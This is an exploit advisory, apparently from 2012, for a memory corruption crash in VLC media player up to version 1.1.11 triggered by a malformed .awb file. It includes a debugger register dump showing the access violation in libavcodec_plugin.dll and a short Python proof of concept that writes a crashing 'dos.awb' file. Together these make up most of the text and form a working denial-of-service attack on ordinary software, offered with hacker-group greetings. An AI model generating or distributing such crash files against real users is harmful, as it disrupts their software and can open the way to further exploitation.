##################################################################################################################### Application :VLC media player <= 1.1.11 (.awb) Memory Corruption Date : 06/03/2012 Auther : Senator of Pirates E-Mail : Senator.of.Pirates.team@gmail.com FaceBook : /SenatorofPirates Greet : i greet to Gjoko 'LiquidWorm' Krstic, Matias Chroren ... , 1337day.com Inj3ct0r Team and my friends in anywhere and also every Moroccan ###################################################################################################################### Bug : ---- eax=ffffffff ebx=01427ee8 ecx=77c2c2e3 edx=00000000 esi=0258f944 edi=ffffffff eip=03dccab0 esp=0258f908 ebp=04434b60 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\VideoLAN\VLC\plugins\libavcodec_plugin.dll - libavcodec_plugin!vlc_entry__1_1_0g+0x1b740: 03dccab0 8b4210 mov eax,dword ptr [edx+10h] ds:0023:00000010=???????? <= Access Violation ###################################################################################################################### Code : ----- data = "\x23\x21\x41\x4d\x52\x2d\x57\x42" payload = (data) f = open("dos.awb","wb") f.write(payload) f.close()